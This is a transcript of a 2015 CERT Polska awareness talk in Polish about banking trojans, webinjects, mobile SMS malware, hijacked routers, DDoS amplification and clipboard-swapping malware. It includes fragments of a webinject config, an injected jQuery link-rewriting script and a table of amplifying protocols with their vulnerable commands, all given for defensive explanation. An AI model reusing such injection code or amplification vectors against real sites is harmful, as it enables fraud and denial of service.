<cyber> Zagrożenia </cyber>

Transkrypt

1

2 <cyber> Zagrożenia </cyber> Wszystko, co chcielibyście wiedzieć o bezpieczeństwie w sieci a boicie się zapytać Radosław Żuber - NASK / CERT Polska Krajowa Izba Gospodarcza - 29/10/2015

3 O CERT Polska Działamy w strukturach Naukowej i Akademickiej Sieci Komputerowej (NASK) Do głównych zadań należy: rejestrowanie i obsługa zdarzeń naruszających bezpieczeństwo sieci aktywne reagowanie w przypadku wystąpienia bezpośrednich zagrożeń dla użytkowników współpraca z innymi zespołami CERT w Polsce i na świecie prowadzenie działań zmierzających do wzrostu świadomości dotyczącej bezpieczeństwa teleinformatycznego działalność badawcza z zakresu metod wykrywania incydentów bezpieczeństwa, analizy złośliwego oprogramowania i systemów wymiany informacji o zagrożeniach rozwijanie własnych narzędzi do wykrywania, monitorowania, analizy i korelacji zagrożeń 3/65

4 Źródło: krebsonsecurity.com 4/65

5 Boty w Polsce w lutym /65

6 Boty w Polsce w październiku /65

7 Jak ukraść 10 milionów?

8 Pozyskujemy malware 8/65

9 Dostarczamy malware 9/65

10 Dostarczamy malware 10/65

11 Dostarczamy malware 11/65

12 Dostarczamy malware 12/65

13 Dostarczamy malware 13/65

14 Zarządzamy - VMZeus 14/65

15 Zarządzamy - VMZeus 15/65

16 Zarządzamy - VMZeus 16/65

17 Zarządzamy - VMZeus 17/65

18 Zarządzamy - Tinba 18/65

19 Zarządzamy - Andromeda 19/65

20 Man in the Browser

21 Man in the Browser 21/65

22 Man in the Browser 22/65

23 Automatic Transfer System 23/65

24 az7 Home Banks Holders Drops Dropovods Transactions Logs Statistics Logout User: coder Now: :46:37 LOC Country Name Acounts Comments CZ BANK1 157 webinjects.txt CZ BANK2 0 webinjects.txt PL BANK3 0 webinjects.txt PL BANK4 396 webinjects.txt PL BANK5 0 webinjects.txt 24/65

25 rbaatsengine 25/65

26 rbaatsengine 26/65

27 rbaatsengine 27/65

28 Przystępujemy do działania

29 Webinject! <script id="inj_lib" src=" JAVASCRIPT Target URL: "*/nasz.internetowy.bank/*" data_before <head*> data_end data_inject <script id="inj_lib" src=" data_end data_after data_end WEBINJECT 29/65

30 Wyświetlany komunikat (pisownia oryginalna) Ze wzgledu na wzrastajaca ilosc wystepowania nieuczciwych transakcji z rachunkow klientow wszystkie platnosci przez Internet bankowy podlegaja ubezpieczeniu. kwoty platnosci do zl - bezoplatnie kwoty platnosci ponad zl - 50 zl. 30/65

31 Wyświetlany komunikat 31/65

32 Wyświetlany komunikat 32/65

33 Zainfekujmy smartfona

34

35 Możliwości get info znak sterujący #, numer tel. gdzieś w wiadomości new number znak sterujący /, numer tel. gdzieś w wiadomości n znak sterujący, uninstall znak sterujący! /65

36 Wątek hiszpański fonyou.es 36/65

37

38 Hacked router

39 Złośliwe resolvery

40 Doniesienia o lukach... Źródła: zaufanatrzeciastrona.pl niebezpiecznik.pl sekurak.pl 40/65

41 Następstwa luk... Źródła: zaufanatrzeciastrona.pl niebezpiecznik.pl sekurak.pl 41/65

42 Jak to działa? 42/65

43 Jak to działa? 43/65

44 Dołączony kod na końcu strony <script> JAVASCRIPT jquery(document).ready(function() { jquery('a[href*="ebgz.pl"]').attr('href',' jquery('li p a.button.green').attr('href',' }); </script> 44/65

45

46

47 Jak to wygląda po drugiej stronie?

48

49

50 Jak to wygląda po drugiej stronie? 50/65

51 Infrastruktura "open"

52 Protokoły umożliwiające wzmocnienie ataku DDoS Protocol Bandwidth Ampli cation Factor Vulnerable Command DNS 28 to 54 see: TA13-088A [4] NTP see: TA14-013A [5] SNMPv2 6.3 GetBulk request NetBIOS 3.8 Name resolution SSDP 30.8 SEARCH request CharGEN Character generation request QOTD Quote request BitTorrent 3.8 File search Źródło: US CERT 52/65

53 Protokoły umożliwiające wzmocnienie ataku DDoS Protocol Bandwidth Ampli cation Factor Vulnerable Command Kad 16.3 Peer list exchange Quake Network Protocol 63.9 Server info exchange Steam Protocol 5.5 Server info exchange Multicast DNS (mdns) 2 to 10 Unicast query RIPv Malformed request Portmap (RPCbind) 7 to 28 Malformed request Źródło: US CERT 53/65

54 54/65

55 Polskie wynalazki

56 VBKlip Pierwsze doniesienia w październiku 2013 Funkcjonalność keylogera Przesyłanie logów mailem Podmiania "w schowku" 26 cyfr (również w określonym formacie) na inne 26 cyfr Pobieranie numerów kont słupów z serwera C&C Uruchamiał się również po restarcie systemu VB malware replaces copied bank account number 56/65

57 VBKlip.B Styczeń 2014 Napisany w.net Numer konta zapisany w złośliwym oprogramowaniu Nie potra ł "przeżyć" restartu systemu 57/65

58 Banatrix 58/65

59 Backspacetrix Odkryty pod koniec 2014 roku Ten sam autor co VBKlip.B Napisany w.net Brak komunikacji z C&C - numer konta zapisany w złośliwym oprogramowaniu Logowanie wciśniętych klawiszy i jeśli było wpisanych 26 cyfr (nie licząc białych znaków) - symulowanie odpowiedniej liczby wciśniętych klawiszy shift i backspace 59/65

60 VBKlip.AHK Napisany w AutoHotKey Podmiana ("w schowku") numerów kont lub adresów bitcoinowych Ten sam autor co VBKlip.B 60/65

61 n6 network security incident exchange

62 n6 ponad 600 tys. nowych zdarzeń dziennie dostęp całkowicie bezpłatny 62/65

63 n6 - dołącz do nas Twoje dane już tu są ;-) n6.cert.pl 63/65

64 <Thank You!> secure.edu.pl/warsztaty cert.pl/szkolenia

65